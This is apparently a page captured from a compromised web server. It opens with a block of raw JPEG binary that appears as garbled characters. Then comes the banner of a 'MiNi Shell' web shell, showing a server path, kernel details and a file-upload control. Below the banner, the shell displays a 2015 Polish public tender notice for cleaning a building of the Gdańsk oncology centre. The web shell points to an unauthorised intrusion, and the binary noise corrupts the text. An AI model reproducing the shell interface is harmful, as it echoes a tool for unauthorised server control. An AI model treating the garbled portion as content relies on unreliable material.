JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150205/26570-N-2015.html

<p class="kh_header"><b>Gdańsk: Usługa sprzątania i utrzymania czystości w budynku B Wojewódzkiego Centrum Onkologii w Gdańsku, przy Al. Zwycięstwa 31/32, w okresie 24 m-cy.</b><br>
<b>Numer ogłoszenia: 26570 - 2015; data zamieszczenia: 05.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Onkologii w Gdańsku Sp. z o.o. , ul. M. Skłodowskiej-Curie 2, 80-210 Gdańsk, woj. pomorskie, tel. 58 3419348, faks 58 3419348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wco.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa sprzątania i utrzymania czystości w budynku B Wojewódzkiego Centrum Onkologii w Gdańsku, przy Al. Zwycięstwa 31/32, w okresie 24 m-cy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Usługa sprzątania i utrzymania czystości w budynku: B Wojewódzkiego Centrum Onkologii w Gdańsku, przy Al. Zwycięstwa 31/32, w okresie 24 miesięcy.

1)Do zakresu wykonywanej usługi należy wykonywanie czynności sprzątania i dezynfekcji wszystkich pomieszczeń Centrum w budynku B, w zakresie potrzeb bieżących i interwencyjnych;
2) W przypadku Bloku Operacyjnego - poszczególne czynności wykonywane będą przy udziale jednej osoby sprzątającej, zgodnie z obowiązującym grafikiem pracy ustalanym przez przedstawiciela Zamawiającego, w oparciu o bieżące potrzeby w tym zakresie zgłaszane przez Blok Operacyjny(Zamawiający dysponuje tylko jedną salą operacyjną), każdorazowo aż do zakończenia pracy w danym dniu na Bloku Operacyjnym) - przez 5 dni w tygodniu (od poniedziałku do piątku)
3) W przypadku wykonywania usługi na całym budynku B - poszczególne czynności wykonywane będą przez jedna osobę, w godz. od 8:00 do 15:00 
4) W przypadku stwierdzenia ogniska epidemiologicznego, przedmiotowa usługa będzie wykonywana zgodnie z obowiązującymi procedurami, w ścisłym uzgodnieniu z Pielęgniarką Epidemiologiczną.

2. Przedmiot zamówienia będzie realizowany wg poniższego zestawienia:

Miejsce wykonywanych prac	Powierzchnia w  m. kw.
PARTER 
Strona lewa: Pracownia Diagnostyki Laboratoryjnej, Szatnia, Pokój Informatyków;
Strona prawa: Rejestracja, Pomieszczenia dla pracowni RTG, Gabinety lekarskie, Pracownia Diagnostyki Obrazowej wraz ze sprzętem: rezonans magnetyczny, tomograf komputerowy, RTG, pomieszczenia zaplecza: szatnia dla pielęgniarek, łazienka i pomieszczenia gospodarcze, powierzchnie wspólne: magazyny-2 pomieszczenia: magazyn brudnej bielizny i magazyn odpadów medycznych, ciągi komunikacyjne.                                             
  	941,67








  I PIĘTRO
Strona lewa: Poradnie Onkologiczne (8 gabinetów z łazienkami + łazienka dla pacjentów, dwa pomieszczenia gospodarcze);
Strona prawa: Oddział Onkologiczny (dwa gabinety zabiegowe, gabinety lekarskie z łazienkami + łazienki ogólnodostępne, sale dla pacjentów, Izba przyjęć, Pomieszczenia Działu Farmacji Szpitalnej i ciągi komunikacyjne, Dyżurka Pielęgniarek, Brudownik.	833,85
II PIĘTRO
Strona lewa: Blok Operacyjny (stanowi strefę wysokiego zagrożenia epidemiologicznego) w skład, którego wchodzą: Recepcja, Sale dla pacjentów z łazienkami, Sala Wybudzeń, Sala Operacyjna, Pokój przygotowawczy, Dyżurka pielęgniarek, magazyny- 3 szt., szatnie, gabinet lekarski, myjnia do chirurgicznego mycia rąk; 

 Strona prawa: Oddział Chirurgii Onkologicznej (gabinety lekarskie, sale dla pacjentów, łazienki, izba przyjęć), ciągi komunikacyjne, Brudownik, pomieszczenie porządkowe, dwa magazyny, Dyżurka pielęgniarek
	474,97
III PIĘTRO
Strona lewa: Poradnia zdrowia psychicznego, Infolinia, 6 gabinetów lekarskich(Poradnia kardiologiczna, Poradnia ginekologiczna, Poradnia chirurgii ogólnej, Poradnia onkologiczna, Poradnia hematologiczna,) łazienka dla personelu i łazienka dla pacjentów, ciągi komunikacyjne, pomieszczenie gospodarcze;
  Strona prawa: Poradnia Otolaryngologiczna, Poradnia Urologiczna, Poradnia Chirurgii Ogólnej, Poradnia Chirurgii Onkologicznej, Pracownia Endoskopii, łazienka dla personelu, łazienka dla pacjentów i łazienka dla osób niepełnosprawnych;
 	470,79
IV PIĘTRO
Strona lewa: pomieszczenia Ośrodka Rehabilitacji Dziennej, ciągi komunikacyjne, hole, klatka schodowa, toalety, szatnie;                                                   Strona prawa: pomieszczenia Badań Klinicznych (zastrzega się wykonywanie czynności sprzątania wyłącznie w obecności pracownika Badań Klinicznych), łazienki, dwie sale konferencyjne(w tym jedna sala gimnastyczna), pomieszczenia socjalne, gabinet Dyrektora ds. lecznictwa, pomieszczenie zaplecza Sali konferencyjnej , ciągi komunikacyjne.                                
	458,70
 dane dotyczące powierzchni przedstawiono w oparciu o dokument:Inwentaryzacja Architektoniczna Budynku WCO w Gdańsku (opracowanie z lutego 2011r), zaktualizowane w zakresie wprowadzenia nowego brzmienia niektórych jednostek organizacyjnych zgodnie z załącznikiem nr 1 do Regulaminu Organizacyjnego WCO w Gdańsku sp. z o.o.   
Łączna powierzchnia wszystkich pomieszczeń objętych przedmiotem zamówienia wynosi: 3 179,98 m kw.
Dodatkowa informacja dla Wykonawców: 
a) Zamawiający wymaga, aby z uwagi na fakt funkcjonowania w WCO Systemu Zarządzania Jakością , świadczona przez Wykonawcę usługa była zgodna z systemem zarządzania jakością zgodnie z Normą ISO 9001:2008, zarządzania środowiskowego zgodnie z norma ISO 14001:2004 oraz zarządzania bezpieczeństwem i higieną pracy wg Normy PN-N 18001:2004 , z którymi Zamawiający zapozna Wykonawcę po podpisaniu umowy;
b) WCO przyjmuje codziennie powyżej 300 pacjentów informacja ta pozwoli Wykonawcy na obiektywną ocenę jego potrzeb w zakresie realizacji przedmiotowej usługi;
c) W budynku objętym przedmiotem zamówienia znajdują się podłogi z tarketu, które stanowią 75% zaś 25% powierzchni stanowią podłogi z kafli; w pomieszczeniach Ośrodka Rehabilitacji WCO Poradnia Rehabilitacyjna 45 m kw. powierzchni stanowią podłogi typu panele;
d) przedmiot zamówienia nie obejmuje transportu posiłków dla pacjentów;
e) przedmiot zamówienia nie obejmuje wykonywania prac pomocniczych przy pacjentach;
f) odpady powstałe podczas świadczenia usługi , będą składowane w pojemnikach należących do Zamawiającego
g) Poradnia Urologiczna posiada urządzenie do badania moczu, którego dezynfekcja należy do 
   Wykonawcy.
h) Wykonawca zapewni do codziennego użytku dla pracowników Zamawiającego preparat roztwór roboczy)do dezynfekcji zanieczyszczeń organicznych roztwór roboczy w butelce + ściereczki jednorazowego użytku wraz z kartą charakterystyki preparatu niebezpiecznego w języku polskim przygotowaną według rozporządzenia UE WE 1907/2006 REACH;

Uwaga! Szczegółowe zestawienie i zakres usługi zawarte są w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.13.00-9, 90.91.92.00-4, 90.90.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, gdy złoży Oświadczenie z art. 22ust.1 uPzp - wg zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, gdy złoży Oświadczenie z art. 22ust.1 uPzp -wg zał. nr 2 do SIWZ) oraz wykaże:
a)Wykonanie lub wykonywanie w ciągu ostatnich trzech lat przed upływem terminu składania ofert co najmniej dwóch usług sprzątania szpitala, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia ,każda o wartości nie mniejszej, niż 280 000,00 zł i powierzchni  sprzątania nie mniejszej, niż 3 000,00 m2, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego , że usługi te zostały wykonane należycie, w tym minimum jedna usługa sprzątania związana ze sprzątaniem następujących pomieszczeń(z wyłączeniem sprzątania obiektów takich jak: hale produkcyjne i magazynowe, dworce, budynki mieszkalne):                                                                                                                                                                                     a) takich, w których znajduje się sprzęt medyczny np: rezonans magnetyczny, tomograf komputerowy czy cyfrowy aparat RTG;                                                                                                                                                                    b)oddziału Onkologicznego, gdzie podaje się cytostatyki  ;
c) Bloku Operacyjnego
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymóg posiadania wiedzy i doświadczenia musi być spełniony przynajmniej przez jednego z nich lub łącznie przez wszystkich wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, gdy złoży Oświadczenie z art. 22ust.1 uPzp) oraz wykaże, że: 
a) dysponuje maszyną sprzątającą podłogi tj. automat szorujaco-zbierający, odkurzaczem, i sprzętem wskazanym w pkt.II.8 niniejszej SIWZ - wg zał. nr 5 do SIWZ,  b)oświadczy że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane prawem uprawnienia tj. uprawnienia do pracy na wysokościach c) złoży Oświadczenie na temat wlk. średniego, rocznego zatrudnienia u Wykonawcy usług oraz liczebności personelu kierowniczego -wg zał. nr 7 do SIWZ d) oświadczy, iż dysponuje osobami przeszkolonymi co do zasad utrzymania czystości w obiektach medycznych oraz osobami, mającymi co najmniej roczne doświadczenie w pracy na oddziale chemioterapii, na oddziale rozpuszczania cytostatyków, e) załączy wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  -wg zał. nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, gdy złoży Oświadczenie z art. 22ust.1 uPzp) oraz potwierdzi posiadanie ubezpieczenia od odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie prowadzonej działalności gospodarczej na kwotę min. 280 000,00 zł 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek dot. sytuacji ekonomicznej i finansowej musi być spełniony przynajmniej przez jednego z nich lub łącznie przez wszystkich wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna za spełniony warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli Wykonawca wykaże, że wykonał a w przypadku świadczeń okresowych lub ciągłych wykonuje,   co najmniej dwie  usługi sprzątania szpitala, każda o wartości nie mniejszej, niż 280 000,00 zł i powierzchni  sprzątania nie mniejszej, niż 3 000,00 m2, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego , że usługi te zostały wykonane należycie, w tym minimum  jedna usługa sprzątania związana ze sprzątaniem następujących pomieszczeń(z wyłączeniem sprzątania obiektów takich jak: hale produkcyjne i magazynowe, dworce, budynki mieszkalne):                                                                                                                                                                                     a) takich, w których znajduje się sprzęt medyczny np: rezonans magnetyczny, tomograf komputerowy czy cyfrowy aparat RTG;                                                                                                                                                                    b)oddziału Onkologicznego, gdzie podaje się cytostatyki  ;
c) Bloku Operacyjnego
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymóg posiadania wiedzy i doświadczenia musi być spełniony przynajmniej przez jednego z nich lub łącznie przez wszystkich wykonawców.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Wypełniony Formularz oferty     -  wg zał. nr 1 do SIWZ
2) Zaparafowany Wzór umowy       -  wg zał. nr 13 do SIWZ
3) Wykaz środków czyszczących  -  wg zał. nr 6 do SIWZ
4) Plan Higieny Oddziału Onkologicznego i Oddziału Chirurgii Onkologicznej z Blokiem Operacyjnym, załączony przez Wykonawcę do oferty, podlegający ocenie z zastosowaniem wagi  = 20%
Ocena zgodności zaoferowanego przedmiotu zamówienia z wymaganiami określonymi przez zamawiającego nastąpi na podstawie dokumentów przedłożonych przez wykonawcę wraz z ofertą, przy zastosowaniu formuły spełnia/nie spełnia.
   -  Dokumenty składane prze Wykonawców mogą być przedstawione w formie oryginału lub kserokopii 
      poświadczonej na każdej stronie za zgodność z oryginałem przez Wykonawcę (poświadczenia zgodności  musi dokonać osoba upoważniona do reprezentowania Wykonawcy).
     
